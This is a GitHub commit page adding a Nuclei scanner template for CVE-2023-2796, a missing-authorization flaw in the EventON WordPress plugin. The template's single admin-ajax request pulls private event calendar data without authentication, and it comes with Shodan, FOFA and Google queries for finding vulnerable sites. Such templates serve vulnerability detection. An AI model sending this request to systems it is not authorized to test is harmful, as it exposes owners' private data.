Skip to content

Commit

Permalink
Merge pull request #7665 from projectdiscovery/CVE-2023-2796
Browse files Browse the repository at this point in the history
Create CVE-2023-2796.yaml
  • Loading branch information
pussycat0x committed Jul 12, 2023
2 parents e583a8e + 2bc852f commit 1c1614b
Showing 1 changed file with 48 additions and 0 deletions.
48 changes: 48 additions & 0 deletions http/cves/2023/CVE-2023-2796.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
id: CVE-2023-2796

info:
name: EventON <= 2.1 - Missing Authorization
author: randomrobbie
severity: medium
description: |
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd
- https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d
- https://nvd.nist.gov/vuln/detail/CVE-2023-2796
remediation: Fixed in version 2.1.2
classification:
cve-id: CVE-2023-2796
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: cwe-862
metadata:
max-request: 1
verified: true
shodan-query: 'vuln:CVE-2023-2796'
fofa-query: "wp-content/plugins/eventon/"
google-query: inurl:"/wp-content/plugins/eventon/"
tags: cve,cve2023,wordpress,wp-plugin,wp,eventon,bypass

http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "BEGIN:VCALENDAR"
- "END:VCALENDAR"
condition: and

- type: word
part: header
words:
- "text/Calendar"

- type: status
status:
- 200

0 comments on commit 1c1614b

Please sign in to comment.